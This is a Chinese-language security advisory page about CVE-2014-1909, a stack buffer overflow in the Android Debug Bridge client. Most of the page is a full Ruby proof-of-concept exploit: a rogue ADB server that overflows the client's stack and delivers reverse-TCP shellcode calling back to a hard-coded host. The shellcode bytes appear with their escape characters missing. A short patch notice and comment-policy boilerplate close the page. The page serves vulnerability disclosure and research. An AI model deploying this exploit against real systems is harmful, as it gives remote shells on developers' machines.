发布日期:2014-02-04
更新日期:2014-02-15受影响系统:
Android SDK
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 65403
CVE(CAN) ID: CVE-2014-1909Android SDK Platform Tool是Android设备的开发软件包。Android SDK Tools的Android Debug Bridge存在栈缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用上下文中执行任意代码。<*来源:Joshua J. Drake
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/env ruby
# -*- coding: binary -*-require "socket"
require "uri"puts "[*] Exploit for ADB client stack buffer overflow -jduck"# linux/x86/shell_reverse_tcp - 90 bytes
# http://www.metasploit.com
# VERBOSE=false, LHOST=192.168.0.2, LPORT=2121,
# ReverseConnectRetries=5, ReverseAllowProxy=false,
# PrependFork=true, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependSetresgid=false, PrependSetregid=false,
# PrependSetgid=false, PrependChrootBreak=false,
# AppendExit=true, InitialAutoRunScript=, AutoRunScript=
payload =
"x6ax02x58xcdx80x85xc0x74x06x31xc0xb0x01xcd" +
"x80x31xdbxf7xe3x53x43x53x6ax02x89xe1xb0x66" +
"xcdx80x93x59xb0x3fxcdx80x49x79xf9x68xc0xa8" +
"x00x02x68x02x00x08x49x89xe1xb0x66x50x51x53" +
"xb3x03x89xe1xcdx80x52x68x2fx2fx73x68x68x2f" +
"x62x69x6ex89xe3x52x53x89xe1xb0x0bxcdx80x31" +
"xdbx6ax01x58xcdx80"def read_request(cli)
len = cli.recv(4)
len = len.to_i(16)
puts "[*] request length: #{len}" buf = cli.recv(len)
puts "[*] request: #{buf.inspect}"
buf
endsrv = TCPServer.new 5037
loop {
puts "[*] Waiting for client..."
cli = srv.accept
puts "[*] Accepted client"
req = read_request(cli)
if req != "host:version"
puts "[-] incorrect request!"
next
end res = "OKAY"
res << "-fff"
res << ("A" * 112) # padding # popped registers
res << [
0xc0c00004, # ebx
0xc0c00008, # esi
0xc0c0000c, # edi
0xc0c00010, # ebp
#0x0810efd3, # eip - int 3 / ret
0x812a14b, # eip - jmp esp
].pack("V*") res << payload puts "[*] Sending response (0x%x bytes)" % res.length
cli.write(res)
cli.close
}
srv.close建议:
--------------------------------------------------------------------------------
厂商补丁:Android
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.openhandsetalliance.com/android_overview.htmlIE10 0day 漏洞被利用获取军事情报Cisco Unified Communications Manager 任意文件泄露漏洞相关资讯 Android SDK Platform Tool 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论
|